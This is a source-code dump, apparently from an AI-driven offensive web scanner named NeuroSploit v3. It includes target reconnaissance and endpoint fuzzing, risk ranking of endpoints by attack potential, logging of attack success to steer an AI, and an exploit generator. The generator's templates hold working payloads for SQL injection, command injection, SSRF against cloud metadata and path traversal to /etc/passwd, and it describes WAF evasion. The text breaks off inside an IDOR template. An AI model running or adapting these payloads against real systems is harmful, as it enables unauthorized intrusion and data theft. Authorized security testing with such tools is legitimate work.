urls_to_check.append((f"{target}{path}", "common_hidden", 6))
# Batch check existence (parallel HEAD requests)
check_tasks = [self._check_url_alive(url) for url, _, _ in urls_to_check]
results = await asyncio.gather(*check_tasks, return_exceptions=True)
for (url, source, priority), alive in zip(urls_to_check, results):
if alive is True:
endpoints.append(EndpointInfo(
url=url, method="GET", source=source, priority=priority,
))
logger.info(f"[DeepRecon] Framework discovery: {len(endpoints)}/{len(urls_to_check)} alive")
return endpoints
# ------------------------------------------------------------------
# Path pattern fuzzing
# ------------------------------------------------------------------
async def fuzz_api_patterns(
self, target: str, known_endpoints: List[str]
) -> List[EndpointInfo]:
"""Infer and test related endpoints from discovered patterns."""
target = target.rstrip("/")
target_parsed = urlparse(target)
target_origin = f"{target_parsed.scheme}://{target_parsed.netloc}"
inferred: Set[str] = set()
# Extract API path patterns
api_bases: Set[str] = set()
api_resources: Set[str] = set()
for ep in known_endpoints:
parsed = urlparse(ep)
path = parsed.path
# Identify API base paths like /api/v1, /api/v2
m = re.match(r'(/api(?:/v\d+)?)', path)
if m:
api_bases.add(m.group(1))
# Extract resource name
rest = path[len(m.group(1)):]
parts = [p for p in rest.split("/") if p and not p.isdigit() and not re.match(r'^[0-9a-f-]{8,}$', p)]
if parts:
api_resources.add(parts[0])
# Common REST resource names to try
COMMON_RESOURCES = [
"users", "user", "auth", "login", "register", "logout",
"profile", "settings", "admin", "posts", "articles",
"comments", "categories", "tags", "search", "upload",
"files", "images", "media", "notifications", "messages",
"products", "orders", "payments", "invoices", "customers",
"dashboard", "reports", "analytics", "logs", "events",
"webhooks", "tokens", "sessions", "roles", "permissions",
"config", "health", "status", "version", "docs",
]
# Common REST sub-patterns
CRUD_SUFFIXES = [
"", "/1", "/me", "/all", "/list", "/search",
"/count", "/export", "/import", "/bulk",
]
for base in api_bases:
# Try common resources under each API base
for resource in COMMON_RESOURCES:
if resource not in api_resources:
inferred.add(f"{target_origin}{base}/{resource}")
# Try CRUD variants for known resources
for resource in api_resources:
for suffix in CRUD_SUFFIXES:
inferred.add(f"{target_origin}{base}/{resource}{suffix}")
# Remove already-known endpoints
known_normalized = {_normalize_url(ep) for ep in known_endpoints}
inferred = {url for url in inferred if _normalize_url(url) not in known_normalized}
# Batch check (parallel, capped)
to_check = sorted(inferred)[:100]
check_tasks = [self._check_url_alive(url) for url in to_check]
results = await asyncio.gather(*check_tasks, return_exceptions=True)
discovered = []
for url, alive in zip(to_check, results):
if alive is True:
discovered.append(EndpointInfo(
url=url, method="GET", source="api_fuzzing", priority=6,
))
logger.info(f"[DeepRecon] API fuzzing: {len(discovered)}/{len(to_check)} alive")
return discovered
# ------------------------------------------------------------------
# Multi-method discovery
# ------------------------------------------------------------------
async def discover_methods(
self, target: str, endpoints: List[str], sample_size: int = 20
) -> Dict[str, List[str]]:
"""Test which HTTP methods each endpoint accepts (OPTIONS + probing)."""
results: Dict[str, List[str]] = {}
sampled = endpoints[:sample_size]
async def _check_options(url: str) -> Tuple[str, List[str]]:
try:
session = await self._get_session()
async with session.options(
url, ssl=False, timeout=aiohttp.ClientTimeout(total=5)
) as resp:
allow = resp.headers.get("Allow", "")
if allow:
return url, [m.strip().upper() for m in allow.split(",")]
# Also check Access-Control-Allow-Methods
cors = resp.headers.get("Access-Control-Allow-Methods", "")
if cors:
return url, [m.strip().upper() for m in cors.split(",")]
except Exception:
pass
return url, []
tasks = [_check_options(url) for url in sampled]
responses = await asyncio.gather(*tasks, return_exceptions=True)
for resp in responses:
if isinstance(resp, tuple):
url, methods = resp
if methods:
results[url] = methods
return results
# ------------------------------------------------------------------
# Deep technology fingerprinting
# ------------------------------------------------------------------
_FINGERPRINT_FILES = [
"/readme.txt", "/README.md", "/CHANGELOG.md", "/CHANGES.txt",
"/package.json", "/composer.json", "/Gemfile.lock",
"/requirements.txt", "/go.mod", "/pom.xml", "/build.gradle",
]
_WP_PROBES = [
"/wp-links-opml.php",
"/wp-includes/js/wp-embed.min.js",
]
_DRUPAL_PROBES = [
"/CHANGELOG.txt",
"/core/CHANGELOG.txt",
]
RE_VERSION = re.compile(r'["\']?version["\']?\s*[:=]\s*["\']?(\d+\.\d+[\w.\-]*)')
RE_WP_VER = re.compile(r'ver=(\d+\.\d+[\w.\-]*)')
RE_DRUPAL_VER = re.compile(r'Drupal\s+(\d+\.\d+[\w.\-]*)')
async def deep_fingerprint(
self, target: str, headers: Dict, body: str
) -> List[Dict]:
"""Detect software and versions from well-known files and probes."""
target = target.rstrip("/")
results: List[Dict] = []
seen: set = set()
def _add(software: str, version: str, source: str):
key = (software.lower(), version)
if key not in seen:
seen.add(key)
results.append({"software": software, "version": version, "source": source})
# Generic version files
tasks = {path: self._fetch(f"{target}{path}") for path in self._FINGERPRINT_FILES}
bodies = dict(zip(tasks.keys(), await asyncio.gather(*tasks.values(), return_exceptions=True)))
for path, content in bodies.items():
if not isinstance(content, str):
continue
if path.endswith(".json"):
try:
doc = json.loads(content)
name = doc.get("name", "unknown")
ver = doc.get("version", "")
if ver:
_add(name, ver, path)
except (json.JSONDecodeError, ValueError, AttributeError): # AttributeError: top-level JSON is not an object
pass
elif path == "/go.mod":
m = re.search(r'^module\s+(\S+)', content, re.MULTILINE)
if m:
_add(m.group(1), "go-module", path)
for dep_m in re.finditer(r'^\s+(\S+)\s+(v[\d.]+)', content, re.MULTILINE):
_add(dep_m.group(1), dep_m.group(2), path)
elif path == "/requirements.txt":
for dep_m in re.finditer(r'^([a-zA-Z0-9_\-]+)==([\d.]+)', content, re.MULTILINE):
_add(dep_m.group(1), dep_m.group(2), path)
elif path == "/Gemfile.lock":
for dep_m in re.finditer(r'^\s{4}([a-z_\-]+)\s+\(([\d.]+)\)', content, re.MULTILINE):
_add(dep_m.group(1), dep_m.group(2), path)
else:
m = self.RE_VERSION.search(content)
if m:
_add("unknown", m.group(1), path)
# WordPress probes
for wp_path in self._WP_PROBES:
content = await self._fetch(f"{target}{wp_path}")
if not content:
continue
m = self.RE_WP_VER.search(content)
if m:
_add("WordPress", m.group(1), wp_path)
elif "WordPress" in content or "wp-" in content:
_add("WordPress", "unknown", wp_path)
# Drupal probes
for dp_path in self._DRUPAL_PROBES:
content = await self._fetch(f"{target}{dp_path}")
if not content:
continue
m = self.RE_DRUPAL_VER.search(content)
if m:
_add("Drupal", m.group(1), dp_path)
return results
# ------------------------------------------------------------------
# Comprehensive recon pipeline
# ------------------------------------------------------------------
async def full_recon(
self, target: str, technologies: List[str],
js_urls: List[str], known_endpoints: List[str],
) -> Dict:
"""Run ALL recon phases and return aggregated results."""
results: Dict = {
"sitemap_urls": [],
"robots_paths": [],
"js_analysis": None,
"api_schema": None,
"framework_endpoints": [],
"fuzzed_endpoints": [],
"method_map": {},
"fingerprints": [],
"all_endpoints": [],
}
# Run independent phases in parallel
sitemap_task = self.parse_sitemap(target)
robots_task = self.parse_robots(target)
js_task = self.crawl_js_files(target, js_urls) if js_urls else asyncio.sleep(0)
api_task = self.enumerate_api(target, technologies)
fw_task = self.discover_framework_endpoints(target, technologies)
sitemap_result, robots_result, js_result, api_result, fw_result = \
await asyncio.gather(sitemap_task, robots_task, js_task, api_task, fw_task,
return_exceptions=True)
if isinstance(sitemap_result, list):
results["sitemap_urls"] = sitemap_result
if isinstance(robots_result, tuple):
results["robots_paths"] = robots_result[0]
if isinstance(js_result, JSAnalysisResult):
results["js_analysis"] = js_result
if isinstance(api_result, APISchema):
results["api_schema"] = api_result
if isinstance(fw_result, list):
results["framework_endpoints"] = fw_result
# Aggregate all discovered endpoints
all_eps = set(known_endpoints)
all_eps.update(results["sitemap_urls"])
all_eps.update(results["robots_paths"])
if results["js_analysis"]:
all_eps.update(results["js_analysis"].endpoints)
if results["api_schema"]:
for ep in results["api_schema"].endpoints:
url = ep.get("url", "")
if url.startswith("/"):
all_eps.add(urljoin(target, url))
elif url.startswith("http"):
all_eps.add(url)
for fw_ep in results["framework_endpoints"]:
all_eps.add(fw_ep.url)
# Now run API fuzzing with ALL known endpoints
try:
fuzzed = await self.fuzz_api_patterns(target, sorted(all_eps))
if isinstance(fuzzed, list):
results["fuzzed_endpoints"] = fuzzed
for ep in fuzzed:
all_eps.add(ep.url)
except Exception as e:
logger.warning(f"[DeepRecon] API fuzzing error: {e}")
# Discover methods for a sample
try:
methods = await self.discover_methods(target, sorted(all_eps))
results["method_map"] = methods
except Exception as e:
logger.warning(f"[DeepRecon] Method discovery error: {e}")
results["all_endpoints"] = sorted(all_eps)[:MAX_ENDPOINTS]
logger.info(f"[DeepRecon] Total endpoints discovered: {len(results['all_endpoints'])}")
return results
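The manifest handling in `deep_fingerprint` above can be sketched as a pure function, which makes the parsing rules easier to check in isolation. This is a minimal sketch, not the module's actual code: `extract_versions` and `REQ_PIN` are hypothetical names, only the `.json` and `/requirements.txt` branches are covered, and the `isinstance` guard is an added assumption for manifests whose top level is not a JSON object.

```python
import json
import re
from typing import List, Tuple

# Same pinned-requirement pattern as the requirements.txt branch above.
REQ_PIN = re.compile(r'^([a-zA-Z0-9_\-]+)==([\d.]+)', re.MULTILINE)


def extract_versions(path: str, content: str) -> List[Tuple[str, str]]:
    """Return (software, version) pairs found in one fetched manifest body."""
    found: List[Tuple[str, str]] = []
    if path.endswith(".json"):
        try:
            doc = json.loads(content)
        except ValueError:  # json.JSONDecodeError is a ValueError subclass
            return found
        # Assumption: skip manifests whose top level is a list or scalar.
        if isinstance(doc, dict) and doc.get("version"):
            found.append((str(doc.get("name", "unknown")), str(doc["version"])))
    elif path == "/requirements.txt":
        # findall returns one (name, version) tuple per "name==version" line.
        found.extend(REQ_PIN.findall(content))
    return found
```

Unpinned requirements such as `requests>=2.0` are ignored here, as in the original pattern, because only `==` pins carry an exact version.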
@@ -1,270 +0,0 @@
"""
NeuroSploit v3 - Endpoint Classifier
Classifies endpoints by function type (auth, upload, api, admin, etc.)
and assigns risk scores + priority vulnerability types for targeted testing.
Replaces linear endpoint iteration with risk-ranked testing order.
"""
import re
import logging
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import urlparse, parse_qs
logger = logging.getLogger(__name__)
@dataclass
class EndpointProfile:
"""Classification result for a single endpoint."""
url: str
endpoint_type: str # "auth", "upload", "admin", "api", "search", "data", "redirect", "download", "generic"
risk_score: float # 0.0 - 1.0
priority_vulns: List[str] = field(default_factory=list)
method: str = "GET"
params: List[str] = field(default_factory=list)
has_auth_indicators: bool = False
has_file_handling: bool = False
has_user_input: bool = False
tech_hints: List[str] = field(default_factory=list)
class EndpointClassifier:
"""Classifies endpoints by function and assigns risk scores.
Instead of testing all endpoints equally, this module ranks them
by type and attack potential, directing more testing effort at
high-value targets (admin panels, auth endpoints, file uploads).
"""
ENDPOINT_TYPES = {
"auth": {
"indicators": [
"/login", "/auth", "/signin", "/sign-in", "/register",
"/signup", "/sign-up", "/password", "/forgot", "/reset",
"/logout", "/signout", "/sign-out", "/oauth", "/sso",
"/token", "/session", "/2fa", "/mfa", "/verify",
"/activate", "/confirm", "/callback",
],
"priority_vulns": [
"auth_bypass", "brute_force", "weak_password",
"credential_stuffing", "session_fixation",
"jwt_manipulation", "broken_authentication",
],
"risk_weight": 0.90,
},
"upload": {
"indicators": [
"/upload", "/file", "/import", "/attachment", "/media",
"/image", "/avatar", "/photo", "/document", "/asset",
"/resource", "/blob", "/storage",
],
"priority_vulns": [
"file_upload", "xxe", "path_traversal",
"arbitrary_file_read", "rfi", "command_injection",
],
"risk_weight": 0.85,
},
"admin": {
"indicators": [
"/admin", "/manage", "/dashboard", "/panel", "/console",
"/control", "/backend", "/cms", "/wp-admin", "/administrator",
"/phpmyadmin", "/cpanel", "/webadmin", "/sysadmin",
"/management", "/internal", "/debug", "/monitoring",
],
"priority_vulns": [
"auth_bypass", "privilege_escalation", "default_credentials",
"exposed_admin_panel", "idor", "bfla",
],
"risk_weight": 0.95,
},
"api": {
"indicators": [
"/api/", "/v1/", "/v2/", "/v3/", "/graphql", "/rest/",
"/json", "/xml", "/soap", "/rpc", "/grpc", "/webhook",
"/ws/", "/websocket",
],
"priority_vulns": [
"idor", "bola", "bfla", "jwt_manipulation",
"mass_assignment", "sqli_error", "nosql_injection",
"api_rate_limiting", "broken_authentication",
],
"risk_weight": 0.80,
},
"search": {
"indicators": [
"/search", "/query", "/find", "/lookup", "/filter",
"/browse", "/explore", "/autocomplete", "/suggest",
],
"param_indicators": ["q", "query", "search", "keyword", "s", "term"],
"priority_vulns": [
"sqli_error", "sqli_blind", "xss_reflected",
"nosql_injection", "ssti", "xss_stored",
],
"risk_weight": 0.75,
},
"data": {
"indicators": [
"/users", "/accounts", "/orders", "/profile", "/settings",
"/preferences", "/billing", "/payment", "/invoice",
"/transaction", "/subscription", "/notification",
"/message", "/comment", "/post", "/article",
],
"priority_vulns": [
"idor", "bola", "mass_assignment",
"data_exposure", "information_disclosure",
"privilege_escalation",
],
"risk_weight": 0.75,
},
"redirect": {
"indicators": [
"/redirect", "/goto", "/out", "/external", "/link",
"/url", "/forward", "/return", "/next", "/continue",
],
"param_indicators": ["url", "redirect", "next", "return", "goto", "dest"],
"priority_vulns": [
"open_redirect", "ssrf", "ssrf_cloud",
],
"risk_weight": 0.70,
},
"download": {
"indicators": [
"/download", "/export", "/report", "/generate",
"/pdf", "/csv", "/xlsx", "/print",
],
"priority_vulns": [
"lfi", "path_traversal", "arbitrary_file_read",
"ssrf", "command_injection", "ssti",
],
"risk_weight": 0.80,
},
}
# Response header indicators for tech detection
TECH_INDICATORS = {
"php": ["x-powered-by: php", ".php", "phpsessid"],
"asp": ["x-powered-by: asp", "x-aspnet-version", ".aspx", ".asp"],
"java": ["x-powered-by: servlet", "jsessionid", ".jsp", ".do", ".action"],
"python": ["x-powered-by: flask", "x-powered-by: django", "csrftoken"],
"node": ["x-powered-by: express", "connect.sid"],
"ruby": ["x-powered-by: phusion", "_session_id", ".rb"],
"wordpress": ["wp-", "wordpress", "wp-content", "wp-json"],
"drupal": ["drupal", "sites/default"],
"joomla": ["joomla", "administrator/index.php"],
}
def classify(self, url: str, method: str = "GET",
params: Optional[List[str]] = None,
response_headers: Optional[Dict] = None) -> EndpointProfile:
"""Classify a single endpoint and return its profile."""
parsed = urlparse(url)
path = parsed.path.lower()
params = params or list(parse_qs(parsed.query).keys())
best_type = "generic"
best_score = 0.30
best_vulns = ["xss_reflected", "sqli_error"]
for etype, config in self.ENDPOINT_TYPES.items():
score = 0.0
# Path-based matching
for indicator in config["indicators"]:
if indicator in path:
score = max(score, config["risk_weight"])
break
# Parameter-based matching
param_indicators = config.get("param_indicators", [])
if params and param_indicators:
for p in params:
if p.lower() in param_indicators:
score = max(score, config["risk_weight"] * 0.9)
break
if score > best_score:
best_score = score
best_type = etype
best_vulns = list(config["priority_vulns"])
# Boost for dangerous methods
if method.upper() in ("POST", "PUT", "PATCH", "DELETE"):
best_score = min(1.0, best_score + 0.05)
# Boost for parameters (more params = more attack surface)
if params:
param_boost = min(0.10, len(params) * 0.02)
best_score = min(1.0, best_score + param_boost)
# Detect tech hints from headers
tech_hints = []
if response_headers:
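# Render as "name: value" lines; str(dict) would never contain "x-powered-by: php"
header_str = "\n".join(f"{k}: {v}" for k, v in response_headers.items()).lower()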
for tech, indicators in self.TECH_INDICATORS.items():
if any(ind in header_str for ind in indicators):
tech_hints.append(tech)
return EndpointProfile(
url=url,
endpoint_type=best_type,
risk_score=round(best_score, 2),
priority_vulns=best_vulns,
method=method,
params=params or [],
has_auth_indicators=best_type == "auth",
has_file_handling=best_type in ("upload", "download"),
has_user_input=best_type in ("search", "data", "api"),
tech_hints=tech_hints,
)
def rank_endpoints(self, endpoints: List[Dict]) -> List[Tuple[Dict, float]]:
"""Rank a list of endpoints by risk score.
Args:
endpoints: List of dicts with at minimum 'url' key,
optionally 'method', 'params', 'headers'.
Returns:
List of (endpoint_dict, risk_score) sorted by risk descending.
"""
ranked = []
for ep in endpoints:
url = ep.get("url", ep.get("endpoint", ""))
method = ep.get("method", "GET")
params = ep.get("params", [])
headers = ep.get("headers", ep.get("response_headers", {}))
profile = self.classify(url, method, params, headers)
ep["_profile"] = profile
ranked.append((ep, profile.risk_score))
ranked.sort(key=lambda x: x[1], reverse=True)
return ranked
def get_endpoint_vuln_priorities(self, url: str, method: str = "GET",
params: Optional[List[str]] = None) -> List[str]:
"""Return vuln types most likely to succeed on this endpoint."""
profile = self.classify(url, method, params)
return profile.priority_vulns
def get_high_risk_endpoints(self, endpoints: List[Dict],
threshold: float = 0.7) -> List[Dict]:
"""Filter endpoints to only high-risk ones."""
ranked = self.rank_endpoints(endpoints)
return [ep for ep, score in ranked if score >= threshold]
def get_endpoint_test_budget(self, risk_score: float,
base_types: int = 5) -> int:
"""Return how many vuln types to test based on risk score.
High-risk endpoints get more testing effort.
"""
if risk_score >= 0.90:
return base_types * 3 # 15 types for admin/auth
elif risk_score >= 0.80:
return base_types * 2 # 10 types for api/upload/download
elif risk_score >= 0.70:
return int(base_types * 1.5) # 7 types for search/data/redirect
return base_types # 5 types for generic
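The scoring flow in `classify` and `get_endpoint_test_budget` above can be illustrated with a trimmed, standalone sketch. The names `RISK_WEIGHTS`, `score_endpoint` and `budget_for` are hypothetical, the indicator table is a three-entry subset of `ENDPOINT_TYPES` chosen for illustration, and parameter-name matching and tech hints are left out.

```python
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlparse

# Illustrative subset of ENDPOINT_TYPES: type -> (path indicators, risk weight).
RISK_WEIGHTS: Dict[str, Tuple[List[str], float]] = {
    "admin": (["/admin", "/dashboard"], 0.95),
    "auth": (["/login", "/token"], 0.90),
    "api": (["/api/", "/graphql"], 0.80),
}


def score_endpoint(url: str, method: str = "GET") -> Tuple[str, float]:
    """Return (endpoint_type, risk_score) using path indicators plus boosts."""
    parsed = urlparse(url)
    path = parsed.path.lower()
    params = list(parse_qs(parsed.query).keys())

    best_type, best_score = "generic", 0.30
    for etype, (indicators, weight) in RISK_WEIGHTS.items():
        if any(ind in path for ind in indicators) and weight > best_score:
            best_type, best_score = etype, weight

    # State-changing methods get a small boost.
    if method.upper() in ("POST", "PUT", "PATCH", "DELETE"):
        best_score = min(1.0, best_score + 0.05)
    # Each query parameter adds 0.02, capped at 0.10.
    if params:
        best_score = min(1.0, best_score + min(0.10, len(params) * 0.02))
    return best_type, round(best_score, 2)


def budget_for(risk_score: float, base_types: int = 5) -> int:
    """Map a risk score to the number of vulnerability types to test."""
    if risk_score >= 0.90:
        return base_types * 3
    if risk_score >= 0.80:
        return base_types * 2
    if risk_score >= 0.70:
        return int(base_types * 1.5)
    return base_types
```

Because the highest matching weight wins, a path such as `/admin/login` is classified as `admin` rather than `auth`, and the method and parameter boosts can move an endpoint into a higher budget tier than its base weight alone would.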
@@ -1,159 +0,0 @@
"""
NeuroSploit v3 - Execution History
Tracks attack success/failure patterns across scans to learn what works.
Records technology-to-vulnerability-type mappings with success rates.
Used by the AI to prioritize tests based on historical data.
"""
import json
import logging
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
from collections import defaultdict
from urllib.parse import urlparse
logger = logging.getLogger(__name__)
class ExecutionHistory:
"""Tracks which attacks work against which technologies across scans."""
MAX_ATTACKS = 500 # Keep last N attack records
def __init__(self, history_file: str = "data/execution_history.json"):
self.history_file = Path(history_file)
self._attacks: List[Dict] = []
# tech_lower -> vuln_type -> {"success": int, "fail": int}
self._tech_success: Dict[str, Dict[str, Dict[str, int]]] = {}
self._dirty = False
self._load()
def _load(self):
"""Load execution history from disk."""
if not self.history_file.exists():
return
try:
data = json.loads(self.history_file.read_text())
self._attacks = data.get("attacks", [])
for tech, vulns in data.get("tech_success", {}).items():
self._tech_success[tech] = {}
for vuln, counts in vulns.items():
self._tech_success[tech][vuln] = {
"success": counts.get("success", 0),
"fail": counts.get("fail", 0),
}
logger.info(f"Loaded execution history: {len(self._attacks)} attacks, "
f"{len(self._tech_success)} technologies tracked")
except Exception as e:
logger.warning(f"Failed to load execution history: {e}")
def _save(self):
"""Persist execution history to disk."""
try:
self.history_file.parent.mkdir(parents=True, exist_ok=True)
self.history_file.write_text(json.dumps({
"attacks": self._attacks[-self.MAX_ATTACKS:],
"tech_success": self._tech_success,
"saved_at": datetime.utcnow().isoformat(),
}, indent=2, default=str))
self._dirty = False
except Exception as e:
logger.warning(f"Failed to save execution history: {e}")
def record(self, tech_stack: List[str], vuln_type: str,
target: str, success: bool, evidence: str = ""):
"""Record an attack attempt result."""
if not vuln_type:
return
# Record the individual attack
try:
domain = urlparse(target).netloc if target else ""
except Exception:
domain = ""
self._attacks.append({
"tech": [t[:50] for t in tech_stack[:5]],
"vuln_type": vuln_type,
"target_domain": domain,
"success": success,
"evidence_preview": (evidence or "")[:100],
"timestamp": datetime.utcnow().isoformat(),
})
# Update aggregated tech_success counters
key = "success" if success else "fail"
for tech in tech_stack[:5]:
tech_lower = tech.lower().strip()
if not tech_lower:
continue
if tech_lower not in self._tech_success:
self._tech_success[tech_lower] = {}
if vuln_type not in self._tech_success[tech_lower]:
self._tech_success[tech_lower][vuln_type] = {"success": 0, "fail": 0}
self._tech_success[tech_lower][vuln_type][key] += 1
# Auto-save periodically (every 20 records)
self._dirty = True
if len(self._attacks) % 20 == 0:
self._save()
def flush(self):
"""Force save if there are unsaved changes."""
if self._dirty:
self._save()
def get_priority_types(self, tech_stack: List[str], top_n: int = 15) -> List[str]:
"""Get vuln types most likely to succeed based on tech stack history."""
scores: Dict[str, float] = defaultdict(float)
for tech in tech_stack:
tech_lower = tech.lower().strip()
if tech_lower not in self._tech_success:
continue
for vuln_type, counts in self._tech_success[tech_lower].items():
total = counts.get("success", 0) + counts.get("fail", 0)
if total < 2:
continue # Need at least 2 data points
rate = counts.get("success", 0) / total
# rate * total reduces to the raw success count, so this ranks by number of successes
scores[vuln_type] += rate * total
sorted_types = sorted(scores.items(), key=lambda x: x[1], reverse=True)
return [t[0] for t in sorted_types[:top_n]]
def get_stats_for_prompt(self, tech_stack: List[str]) -> str:
"""Format execution history as context for AI prompts."""
lines = []
for tech in tech_stack[:5]:
tech_lower = tech.lower().strip()
if tech_lower not in self._tech_success:
continue
vulns = self._tech_success[tech_lower]
top = sorted(
vulns.items(),
key=lambda x: x[1].get("success", 0),
reverse=True
)[:5]
if top:
entries = []
for v, c in top:
s = c.get("success", 0)
total = s + c.get("fail", 0)
entries.append(f"{v}({s}/{total})")
lines.append(f" {tech}: {', '.join(entries)}")
return "\n".join(lines) if lines else " No historical data yet"
def get_total_attacks(self) -> int:
"""Get total number of recorded attacks."""
return len(self._attacks)
def get_success_rate(self) -> float:
"""Get overall success rate."""
if not self._attacks:
return 0.0
successes = sum(1 for a in self._attacks if a.get("success"))
return successes / len(self._attacks)
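The ranking in `get_priority_types` above can be reproduced outside the class to see how the counters turn into an ordering. This is a minimal sketch under stated assumptions: `priority_types` is a hypothetical free function, and the nested dict it takes mirrors the `tech -> vuln_type -> {"success", "fail"}` layout of `_tech_success`.

```python
from collections import defaultdict
from typing import Dict, List

# tech (lowercase) -> vuln_type -> {"success": int, "fail": int}
Counts = Dict[str, Dict[str, Dict[str, int]]]


def priority_types(tech_success: Counts, tech_stack: List[str],
                   top_n: int = 15) -> List[str]:
    """Rank vuln types by accumulated score across the given tech stack."""
    scores: Dict[str, float] = defaultdict(float)
    for tech in tech_stack:
        per_tech = tech_success.get(tech.lower().strip(), {})
        for vuln_type, counts in per_tech.items():
            successes = counts.get("success", 0)
            total = successes + counts.get("fail", 0)
            if total < 2:
                continue  # a single attempt is not enough evidence
            # Same formula as the original: rate * total == successes.
            scores[vuln_type] += (successes / total) * total
    ranked = sorted(scores.items(), key=lambda kv: kv[1], reverse=True)
    return [vuln_type for vuln_type, _ in ranked[:top_n]]
```

Since `rate * total` cancels to the success count, a type with 3 successes in 100 attempts scores the same as one with 3 successes in 3 attempts; weighting by something other than volume would need a different formula.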
@@ -1,505 +0,0 @@
"""
NeuroSploit v3 - AI-Powered Exploit & PoC Generator
Context-aware exploit generation that:
1. Analyzes finding context (endpoint, params, tech stack, defenses)
2. Selects base PoC template and customizes for target
3. Adds evasion techniques if WAF detected
4. Uses AI to enhance PoC realism and effectiveness
5. Generates multiple formats (curl, Python, HTML, Burp)
6. Supports zero-day hypothesis reasoning
7. Generates chained multi-step exploits
"""
import json
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Any
from urllib.parse import urlparse, urlencode, quote
@dataclass
class ExploitResult:
"""Generated exploit with metadata."""
poc_code: str = ""
format: str = "python" # python, curl, html, burp
formats: Dict[str, str] = field(default_factory=dict) # All formats
validated: bool = False
evasion_applied: bool = False
ai_enhanced: bool = False
description: str = ""
impact: str = ""
steps: List[str] = field(default_factory=list)
token_cost: int = 0
@dataclass
class ZeroDayHypothesis:
"""AI-generated hypothesis about unknown vulnerabilities."""
hypothesis: str
reasoning: str
test_cases: List[Dict] = field(default_factory=list)
confidence: float = 0.0
vuln_type: str = ""
class ExploitGenerator:
"""Generates validated, context-aware exploits and PoCs.
Replaces the basic poc_generator with AI-enhanced, multi-format,
context-aware exploit generation.
"""
# PoC templates by vulnerability type
POC_TEMPLATES = {
"xss_reflected": {
"curl": 'curl -s "{url}?{param}={payload}" | grep -i "{marker}"',
"python": '''import requests
url = "{url}"
payload = "{payload}"
params = {{"{param}": payload}}
resp = requests.get(url, params=params, allow_redirects=False)
if payload in resp.text:
print("[VULNERABLE] XSS reflected - payload returned unencoded in response")
print(f"URL: {{resp.url}}")
else:
print("[SAFE] Payload not reflected")''',
"html": '''<html>
<body>
<h2>XSS PoC - {url}</h2>
<p>Click the link below to trigger the XSS:</p>
<a href="{url}?{param}={payload_encoded}" target="_blank">Trigger XSS</a>
<h3>Automated Test:</h3>
<iframe src="{url}?{param}={payload_encoded}" width="800" height="400"></iframe>
</body>
</html>''',
},
"xss_stored": {
"python": '''import requests
# Step 1: Submit stored payload
url = "{url}"
data = {{"{param}": "{payload}"}}
resp = requests.post(url, data=data)
print(f"[1] Submission: {{resp.status_code}}")
# Step 2: Verify payload on display page
display_url = "{display_url}"
resp2 = requests.get(display_url)
if "{payload}" in resp2.text or "{marker}" in resp2.text:
print("[VULNERABLE] Stored XSS - payload persisted and rendered")
else:
print("[CHECK] Payload submitted but not found on display page")''',
},
"sqli_error": {
"curl": 'curl -s "{url}?{param}={payload}" 2>&1 | grep -iE "sql|syntax|mysql|ora-|postgres|sqlite"',
"python": '''import requests
url = "{url}"
# Test 1: Error-based detection
payloads = ["{payload}", "' OR '1'='1", "1 UNION SELECT NULL--"]
for p in payloads:
resp = requests.get(url, params={{"{param}": p}})
errors = ["sql", "syntax", "mysql", "ora-", "postgres", "sqlite", "microsoft"]
if any(e in resp.text.lower() for e in errors):
print(f"[VULNERABLE] SQL Error with payload: {{p}}")
print(f"Response snippet: {{resp.text[:300]}}")
break
else:
print("[SAFE] No SQL errors detected")''',
},
"sqli_blind": {
"python": '''import requests
import time
url = "{url}"
param = "{param}"
# Boolean-based test
true_resp = requests.get(url, params={{param: "1' AND '1'='1"}})
false_resp = requests.get(url, params={{param: "1' AND '1'='2"}})
if len(true_resp.text) != len(false_resp.text):
print("[VULNERABLE] Boolean-based blind SQLi detected")
print(f" TRUE response: {{len(true_resp.text)}} bytes")
print(f" FALSE response: {{len(false_resp.text)}} bytes")
# Time-based test
start = time.time()
time_resp = requests.get(url, params={{param: "1' AND SLEEP(3)--"}}, timeout=10)
elapsed = time.time() - start
if elapsed > 3:
print(f"[VULNERABLE] Time-based blind SQLi ({{elapsed:.1f}}s delay)")
else:
print("[SAFE] No time-based injection detected")''',
},
"command_injection": {
"curl": 'curl -s "{url}?{param}={payload}"',
"python": '''import requests
url = "{url}"
payloads = [
"{payload}",
"; id",
"| id",
"$(id)",
"`id`",
]
for p in payloads:
resp = requests.get(url, params={{"{param}": p}})
if "uid=" in resp.text or "gid=" in resp.text:
print(f"[VULNERABLE] Command injection with: {{p}}")
print(f"Output: {{resp.text[:500]}}")
break
else:
print("[SAFE] No command injection detected")''',
},
"ssrf": {
"python": '''import requests
url = "{url}"
param = "{param}"
# Test internal resources
targets = [
"http://127.0.0.1/",
"http://localhost/",
"http://169.254.169.254/latest/meta-data/",
"http://[::1]/",
"http://0.0.0.0/",
]
for target in targets:
resp = requests.get(url, params={{param: target}}, timeout=10)
if resp.status_code == 200 and len(resp.text) > 0:
if any(k in resp.text.lower() for k in ["ami-id", "instance", "root:", "localhost"]):
print(f"[VULNERABLE] SSRF to {{target}}")
print(f"Response: {{resp.text[:300]}}")
break
else:
print("[SAFE] No SSRF detected")''',
},
"lfi": {
"curl": 'curl -s "{url}?{param}=../../../../../../etc/passwd" | grep "root:"',
"python": '''import requests
url = "{url}"
param = "{param}"
traversals = [
"../../../../../../etc/passwd",
"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini",
"....//....//....//....//etc/passwd",
"/etc/passwd",
"%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
]
for t in traversals:
resp = requests.get(url, params={{param: t}})
if "root:" in resp.text or "[fonts]" in resp.text:
print(f"[VULNERABLE] LFI with: {{t}}")
print(f"Content: {{resp.text[:500]}}")
break
else:
print("[SAFE] No LFI detected")''',
},
"idor": {
"python": '''import requests
url = "{url}"
param = "{param}"
# Test with sequential IDs
responses = {{}}
for test_id in [1, 2, 3, 100, 999]:
resp = requests.get(url, params={{param: str(test_id)}})
responses[test_id] = {{
"status": resp.status_code,
"length": len(resp.text),
"has_data": resp.status_code == 200 and len(resp.text) > 100
}}
print(f" ID={{test_id}}: status={{resp.status_code}}, size={{len(resp.text)}}")
# Check if different IDs return different data (IDOR indicator)
data_ids = [k for k, v in responses.items() if v["has_data"]]
if len(data_ids) > 1:
